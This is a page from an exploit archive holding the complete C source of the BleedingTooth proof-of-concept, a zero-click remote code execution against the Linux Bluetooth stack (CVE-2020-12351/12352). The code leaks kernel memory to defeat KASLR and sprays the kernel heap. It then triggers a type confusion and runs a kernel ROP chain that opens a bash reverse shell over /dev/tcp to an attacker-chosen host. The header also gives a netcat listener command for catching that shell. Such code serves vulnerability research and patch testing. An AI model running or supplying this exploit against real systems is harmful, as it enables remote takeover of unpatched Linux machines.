Share
## https://sploitus.com/exploit?id=PACKETSTORM:162131
/*  
* BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution  
* by Andy Nguyen (theflow@)  
*  
* This Proof-Of-Concept demonstrates the exploitation of  
* CVE-2020-12351 and CVE-2020-12352.  
*  
* Compile using:  
* $ gcc -o exploit exploit.c -lbluetooth  
*  
* and execute as:  
* $ sudo ./exploit target_mac source_ip source_port  
*  
* In another terminal, run:  
* $ nc -lvp 1337  
* exec bash -i 2>&0 1>&0  
*  
* If successful, a calc can be spawned with:  
* export XAUTHORITY=/run/user/1000/gdm/Xauthority  
* export DISPLAY=:0  
* gnome-calculator  
*  
* This Proof-Of-Concept has been tested against a Dell XPS 15 running  
* Ubuntu 20.04.1 LTS with:  
* - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020  
* x86_64 x86_64 x86_64 GNU/Linux  
*  
* The success rate of the exploit is estimated at 80%.  
*/  
  
#include <bluetooth/bluetooth.h>  
#include <bluetooth/hci.h>  
#include <bluetooth/hci_lib.h>  
#include <bluetooth/l2cap.h>  
#include <errno.h>  
#include <stdlib.h>  
#include <sys/socket.h>  
#include <sys/uio.h>  
#include <unistd.h>  
  
#define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s"  
  
// Increase if the heap spray is not reliable.  
#define NUM_SPRAY_KMALLOC_1024 6  
#define NUM_SPRAY_KMALLOC_128 6  
  
// Increase if stuck at sending packets.  
#define HCI_SEND_ACL_DATA_WAIT_USEC 5000  
  
#define KERNEL_TEXT_BASE 0xffffffff81000000  
  
#define KERNEL_UBUNTU_5_4_0_48 1  
  
#ifdef KERNEL_UBUNTU_5_4_0_48  
#define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46  
#define POP_RAX_RET 0xffffffff8103d0b1  
#define POP_RDI_RET 0xffffffff8108efa0  
#define JMP_RAX 0xffffffff8100005b  
#define RUN_CMD 0xffffffff810ce470  
#define DO_TASK_DEAD 0xffffffff810dc260  
  
#define KASLR_DEFEAT(kaslr_offset, kernel_addr) \  
do { \  
if ((kernel_addr & 0xfffff) == 0xf4d8e) \  
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e; \  
else \  
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4; \  
} while (0)  
#else  
#error "No kernel version defined"  
#endif  
  
#define L2CAP_IDENT 0x41  
  
#define SIGNALLING_CID 0x01  
#define AMP_MGR_CID 0x03  
  
typedef struct {  
uint8_t code;  
uint8_t ident;  
uint16_t len;  
} __attribute__((packed)) a2mp_hdr;  
#define A2MP_HDR_SIZE 4  
  
#define A2MP_COMMAND_REJ 0x01  
typedef struct {  
uint16_t reason;  
} __attribute__((packed)) a2mp_command_rej;  
  
#define A2MP_INFO_REQ 0x06  
typedef struct {  
uint8_t id;  
} __attribute__((packed)) a2mp_info_req;  
  
#define A2MP_INFO_RSP 0x07  
typedef struct {  
uint8_t id;  
uint8_t status;  
uint32_t total_bw;  
uint32_t max_bw;  
uint32_t min_latency;  
uint16_t pal_caps;  
uint16_t assoc_size;  
} __attribute__((packed)) a2mp_info_rsp;  
  
#define A2MP_ASSOC_REQ 0x08  
typedef struct {  
uint8_t id;  
} __attribute__((packed)) a2mp_assoc_req;  
  
#define A2MP_ASSOC_RSP 0x09  
typedef struct {  
uint8_t id;  
uint8_t status;  
uint8_t assoc_data[0];  
} __attribute__((packed)) a2mp_assoc_rsp;  
  
typedef struct {  
uint8_t mode;  
uint8_t txwin_size;  
uint8_t max_transmit;  
uint16_t retrans_timeout;  
uint16_t monitor_timeout;  
uint16_t max_pdu_size;  
} __attribute__((packed)) l2cap_conf_rfc;  
  
static char remote_command[64];  
  
static int hci_sock = 0, l2_sock = 0;  
static uint16_t hci_handle = 0;  
  
static uint64_t kaslr_offset = 0, l2cap_chan_addr = 0;  
  
static uint16_t crc16_tab[] = {  
0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601,  
0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0,  
0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81,  
0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941,  
0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01,  
0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0,  
0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081,  
0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,  
0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00,  
0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0,  
0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981,  
0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41,  
0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700,  
0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0,  
0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281,  
0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,  
0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01,  
0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1,  
0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80,  
0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541,  
0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101,  
0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0,  
0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481,  
0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,  
0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801,  
0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1,  
0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581,  
0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341,  
0x4100, 0x81C1, 0x8081, 0x4040,  
};  
  
static uint16_t crc16(uint16_t crc, const void *buf, size_t size) {  
const uint8_t *p = buf;  
while (size--)  
crc = crc16_tab[(crc ^ (*p++)) & 0xff] ^ (crc >> 8);  
return crc;  
}  
  
static int connect_l2cap(bdaddr_t dst_addr, uint16_t *handle) {  
int l2_sock;  
  
if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {  
perror("[-] socket");  
exit(1);  
}  
  
struct sockaddr_l2 laddr = {0};  
laddr.l2_family = AF_BLUETOOTH;  
memcpy(&laddr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t));  
if (bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {  
perror("[-] bind");  
exit(1);  
}  
  
struct sockaddr_l2 raddr = {0};  
raddr.l2_family = AF_BLUETOOTH;  
raddr.l2_bdaddr = dst_addr;  
if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0 &&  
errno != EALREADY) {  
perror("[-] connect");  
exit(1);  
}  
  
struct l2cap_conninfo conninfo = {0};  
socklen_t len = sizeof(conninfo);  
if (getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &conninfo, &len) < 0) {  
perror("[-] getsockopt");  
exit(1);  
}  
  
if (handle)  
*handle = conninfo.hci_handle;  
  
return l2_sock;  
}  
  
static int connect_hci(void) {  
struct hci_dev_info di = {0};  
int hci_device_id = hci_get_route(NULL);  
int hci_sock = hci_open_dev(hci_device_id);  
if (hci_devinfo(hci_device_id, &di) < 0) {  
perror("[-] hci_devinfo");  
exit(1);  
}  
  
struct hci_filter flt = {0};  
hci_filter_clear(&flt);  
hci_filter_all_ptypes(&flt);  
hci_filter_all_events(&flt);  
if (setsockopt(hci_sock, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) {  
perror("[-] setsockopt(HCI_FILTER)");  
exit(1);  
}  
  
return hci_sock;  
}  
  
static void wait_event_complete_packet(void) {  
while (1) {  
uint8_t buf[256] = {0};  
if (read(hci_sock, buf, sizeof(buf)) < 0) {  
perror("[-] read");  
exit(1);  
}  
if (buf[0] == HCI_EVENT_PKT) {  
hci_event_hdr *hdr = (hci_event_hdr *)&buf[1];  
if (btohs(hdr->evt) == EVT_NUM_COMP_PKTS)  
break;  
}  
}  
}  
  
static void hci_send_acl_data(int hci_sock, uint16_t hci_handle, void *data,  
uint16_t data_length, uint16_t flags) {  
uint8_t type = HCI_ACLDATA_PKT;  
  
hci_acl_hdr hdr = {0};  
hdr.handle = htobs(acl_handle_pack(hci_handle, flags));  
hdr.dlen = data_length;  
  
struct iovec iv[3] = {0};  
iv[0].iov_base = &type;  
iv[0].iov_len = sizeof(type);  
iv[1].iov_base = &hdr;  
iv[1].iov_len = HCI_ACL_HDR_SIZE;  
iv[2].iov_base = data;  
iv[2].iov_len = data_length;  
if (writev(hci_sock, iv, sizeof(iv) / sizeof(struct iovec)) < 0) {  
perror("[-] writev");  
exit(1);  
}  
  
usleep(HCI_SEND_ACL_DATA_WAIT_USEC);  
wait_event_complete_packet();  
}  
  
static void disconnect_a2mp(void) {  
printf("[*] Disconnecting A2MP channel...\n");  
  
struct {  
l2cap_hdr hdr;  
l2cap_cmd_hdr cmd_hdr;  
l2cap_disconn_req disconn_req;  
} disconn_req = {0};  
disconn_req.hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE);  
disconn_req.hdr.cid = htobs(SIGNALLING_CID);  
disconn_req.cmd_hdr.code = L2CAP_DISCONN_REQ;  
disconn_req.cmd_hdr.ident = L2CAP_IDENT;  
disconn_req.cmd_hdr.len =  
htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);  
disconn_req.disconn_req.dcid = htobs(AMP_MGR_CID);  
disconn_req.disconn_req.scid = htobs(AMP_MGR_CID);  
hci_send_acl_data(hci_sock, hci_handle, &disconn_req, sizeof(disconn_req), 2);  
}  
  
static void connect_a2mp(void) {  
printf("[*] Connecting A2MP channel...\n");  
  
struct {  
l2cap_hdr hdr;  
} a2mp_create = {0};  
a2mp_create.hdr.len = htobs(sizeof(a2mp_create) - L2CAP_HDR_SIZE);  
a2mp_create.hdr.cid = htobs(AMP_MGR_CID);  
hci_send_acl_data(hci_sock, hci_handle, &a2mp_create, sizeof(a2mp_create), 2);  
  
// Configure to L2CAP_MODE_BASIC and max MTU.  
struct {  
l2cap_hdr hdr;  
l2cap_cmd_hdr cmd_hdr;  
l2cap_conf_rsp conf_rsp;  
l2cap_conf_opt conf_opt;  
l2cap_conf_rfc conf_rfc;  
l2cap_conf_opt conf_opt2;  
uint16_t conf_mtu;  
} conf_rsp = {0};  
conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);  
conf_rsp.hdr.cid = htobs(SIGNALLING_CID);  
conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;  
conf_rsp.cmd_hdr.ident = L2CAP_IDENT;  
conf_rsp.cmd_hdr.len =  
htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);  
conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);  
conf_rsp.conf_rsp.flags = htobs(0);  
conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);  
conf_rsp.conf_opt.type = L2CAP_CONF_RFC;  
conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);  
conf_rsp.conf_rfc.mode = L2CAP_MODE_BASIC;  
conf_rsp.conf_opt2.type = L2CAP_CONF_MTU;  
conf_rsp.conf_opt2.len = sizeof(uint16_t);  
conf_rsp.conf_mtu = htobs(0xffff);  
hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);  
}  
  
static void prepare_l2cap_chan_addr_leak(void) {  
printf("[*] Preparing to leak l2cap_chan address...\n");  
  
struct {  
l2cap_hdr hdr;  
l2cap_cmd_hdr cmd_hdr;  
l2cap_conf_rsp conf_rsp;  
l2cap_conf_opt conf_opt;  
l2cap_conf_rfc conf_rfc;  
} conf_rsp = {0};  
conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);  
conf_rsp.hdr.cid = htobs(SIGNALLING_CID);  
conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;  
conf_rsp.cmd_hdr.ident = L2CAP_IDENT;  
conf_rsp.cmd_hdr.len =  
htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);  
conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);  
conf_rsp.conf_rsp.flags = htobs(0);  
conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);  
conf_rsp.conf_opt.type = L2CAP_CONF_RFC;  
conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);  
conf_rsp.conf_rfc.mode = L2CAP_MODE_ERTM;  
hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);  
}  
  
static uint64_t leak_kstack(void) {  
printf("[*] Leaking A2MP kernel stack memory...\n");  
  
struct {  
l2cap_hdr hdr;  
a2mp_hdr amp_hdr;  
a2mp_info_req info_req;  
} info_req = {0};  
info_req.hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE);  
info_req.hdr.cid = htobs(AMP_MGR_CID);  
info_req.amp_hdr.code = A2MP_INFO_REQ;  
info_req.amp_hdr.ident = L2CAP_IDENT;  
info_req.amp_hdr.len =  
htobs(sizeof(info_req) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));  
// Use a dummy id to make hci_dev_get() fail.  
info_req.info_req.id = 0x42;  
hci_send_acl_data(hci_sock, hci_handle, &info_req, sizeof(info_req), 2);  
  
while (1) {  
uint8_t buf[256] = {0};  
if (read(hci_sock, buf, sizeof(buf)) < 0) {  
perror("[-] read");  
exit(1);  
}  
if (buf[0] == HCI_ACLDATA_PKT) {  
l2cap_hdr *l2_hdr = (l2cap_hdr *)&buf[5];  
if (btohs(l2_hdr->cid) == AMP_MGR_CID) {  
a2mp_hdr *amp_hdr = (a2mp_hdr *)&buf[9];  
if (amp_hdr->code == A2MP_INFO_RSP)  
return *(uint64_t *)&buf[21];  
}  
}  
}  
  
return 0;  
}  
  
static void trigger_type_confusion(void) {  
struct {  
l2cap_hdr hdr;  
uint16_t ctrl;  
a2mp_hdr amp_hdr;  
a2mp_command_rej cmd_rej;  
uint16_t fcs;  
} cmd_rej = {0};  
cmd_rej.hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE);  
cmd_rej.hdr.cid = htobs(AMP_MGR_CID);  
cmd_rej.ctrl = 0xffff;  
cmd_rej.amp_hdr.code = A2MP_COMMAND_REJ;  
cmd_rej.amp_hdr.ident = L2CAP_IDENT;  
cmd_rej.amp_hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE -  
sizeof(a2mp_hdr) - sizeof(uint32_t));  
cmd_rej.cmd_rej.reason = 0;  
cmd_rej.fcs = crc16(0, &cmd_rej, sizeof(cmd_rej) - sizeof(uint16_t));  
hci_send_acl_data(hci_sock, hci_handle, &cmd_rej, sizeof(cmd_rej), 2);  
}  
  
static void build_krop(uint64_t *rop, uint64_t cmd_addr) {  
*rop++ = kaslr_offset + POP_RAX_RET;  
*rop++ = kaslr_offset + RUN_CMD;  
*rop++ = kaslr_offset + POP_RDI_RET;  
*rop++ = cmd_addr;  
*rop++ = kaslr_offset + JMP_RAX;  
*rop++ = kaslr_offset + POP_RAX_RET;  
*rop++ = kaslr_offset + DO_TASK_DEAD;  
*rop++ = kaslr_offset + JMP_RAX;  
}  
  
static void build_payload(uint8_t data[0x400]) {  
// Fake sk_filter object starting at offset 0x300.  
*(uint64_t *)&data[0x318] = l2cap_chan_addr + 0x320; // prog  
  
// Fake bpf_prog object starting at offset 0x320.  
// RBX points to the amp_mgr object.  
*(uint64_t *)&data[0x350] =  
kaslr_offset +  
PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET; // bpf_func  
*(uint64_t *)&data[0x358] = 0xDEADBEEF; // rbp  
  
// Build kernel ROP chain that executes run_cmd() from kernel/reboot.c.  
// Note that when executing the ROP chain, the data below in memory will be  
// overwritten. Therefore, the argument should be located after the ROP chain.  
build_krop((uint64_t *)&data[0x360], l2cap_chan_addr + 0x3c0);  
strncpy(&data[0x3c0], remote_command, 0x40);  
}  
  
static void spray_kmalloc_1024(int num) {  
// Skip first two hci devices because they may be legit.  
for (int i = 2; i < num + 2; i++) {  
printf("\r[*] Sending packet with id #%d...", i);  
fflush(stdout);  
  
struct {  
l2cap_hdr hdr;  
a2mp_hdr amp_hdr;  
a2mp_info_rsp info_rsp;  
} info_rsp = {0};  
info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);  
info_rsp.hdr.cid = htobs(AMP_MGR_CID);  
info_rsp.amp_hdr.code = A2MP_INFO_RSP;  
info_rsp.amp_hdr.ident = L2CAP_IDENT;  
info_rsp.amp_hdr.len =  
htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));  
info_rsp.info_rsp.id = i;  
hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);  
  
struct {  
l2cap_hdr hdr;  
a2mp_hdr amp_hdr;  
a2mp_assoc_rsp assoc_rsp;  
uint8_t data[0x400];  
} assoc_rsp = {0};  
assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);  
assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);  
assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;  
assoc_rsp.amp_hdr.ident = L2CAP_IDENT;  
assoc_rsp.amp_hdr.len =  
htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));  
assoc_rsp.assoc_rsp.id = i;  
for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)  
memset(&assoc_rsp.data[j], 'A' + j / 8, 8);  
build_payload(assoc_rsp.data);  
  
// Send fragmented l2cap packets (assume ACL MTU is at least 256 bytes).  
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp,  
sizeof(assoc_rsp) - sizeof(assoc_rsp.data), 2);  
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x000], 0x100, 1);  
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x100], 0x100, 1);  
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x200], 0x100, 1);  
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x300], 0x100, 1);  
}  
  
printf("\n");  
}  
  
static void spray_kmalloc_128(int num) {  
// Skip first two hci devices because they may be legit.  
for (int i = 2; i < num + 2; i++) {  
printf("\r[*] Sending packet with id #%d...", i);  
fflush(stdout);  
  
struct {  
l2cap_hdr hdr;  
a2mp_hdr amp_hdr;  
a2mp_info_rsp info_rsp;  
} info_rsp = {0};  
info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);  
info_rsp.hdr.cid = htobs(AMP_MGR_CID);  
info_rsp.amp_hdr.code = A2MP_INFO_RSP;  
info_rsp.amp_hdr.ident = L2CAP_IDENT;  
info_rsp.amp_hdr.len =  
htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));  
info_rsp.info_rsp.id = i;  
hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);  
  
struct {  
l2cap_hdr hdr;  
a2mp_hdr amp_hdr;  
a2mp_assoc_rsp assoc_rsp;  
uint8_t data[0x80];  
} assoc_rsp = {0};  
assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);  
assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);  
assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;  
assoc_rsp.amp_hdr.ident = L2CAP_IDENT;  
assoc_rsp.amp_hdr.len =  
htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));  
assoc_rsp.assoc_rsp.id = i;  
for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)  
memset(&assoc_rsp.data[j], 'A' + j / 8, 8);  
// Fake sock object.  
*(uint64_t *)&assoc_rsp.data[0x10] = l2cap_chan_addr + 0x300; // sk_filter  
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp), 2);  
}  
  
printf("\n");  
}  
  
int main(int argc, char *argv[]) {  
if (argc != 4) {  
printf("Usage: %s target_mac source_ip source_port\n", argv[0]);  
exit(1);  
}  
  
bdaddr_t dst_addr = {0};  
str2ba(argv[1], &dst_addr);  
  
snprintf(remote_command, sizeof(remote_command), REMOTE_COMMAND, argv[2],  
argv[3]);  
printf("[+] Remote command: %s\n", remote_command);  
  
printf("[*] Opening hci device...\n");  
hci_sock = connect_hci();  
  
printf("[*] Connecting to victim...\n");  
l2_sock = connect_l2cap(dst_addr, &hci_handle);  
printf("[+] HCI handle: %x\n", hci_handle);  
  
connect_a2mp();  
  
uint64_t kernel_addr = leak_kstack();  
printf("[+] Kernel address: %lx\n", kernel_addr);  
KASLR_DEFEAT(kaslr_offset, kernel_addr);  
printf("[+] KASLR offset: %lx\n", kaslr_offset);  
if ((kaslr_offset & 0xfffff) != 0) {  
printf("[-] Error KASLR offset is invalid.\n");  
exit(1);  
}  
  
prepare_l2cap_chan_addr_leak();  
l2cap_chan_addr = leak_kstack() - 0x110;  
printf("[+] l2cap_chan address: %lx\n", l2cap_chan_addr);  
if ((l2cap_chan_addr & 0xff) != 0) {  
printf("[-] Error l2cap_chan address is invalid.\n");  
exit(1);  
}  
  
// Somehow, spraying a bit before makes the UaF more reliable.  
printf("[*] Spraying kmalloc-1024...\n");  
spray_kmalloc_1024(0x40);  
  
// Disconnect to free the l2cap_chan object, then reconnect.  
disconnect_a2mp();  
connect_a2mp();  
  
// Attempt to reclaim the freed l2cap_chan object.  
printf("[*] Spraying kmalloc-1024...\n");  
for (int i = 0; i < NUM_SPRAY_KMALLOC_1024; i++) {  
spray_kmalloc_1024(0x40);  
}  
  
// Attempt to control the out-of-bounds read.  
printf("[*] Spraying kmalloc-128...\n");  
for (int i = 0; i < NUM_SPRAY_KMALLOC_128; i++) {  
spray_kmalloc_128(0x40);  
}  
  
printf("[*] Triggering remote code execution...\n");  
disconnect_a2mp();  
trigger_type_confusion();  
  
close(l2_sock);  
hci_close_dev(hci_sock);  
  
return 0;  
}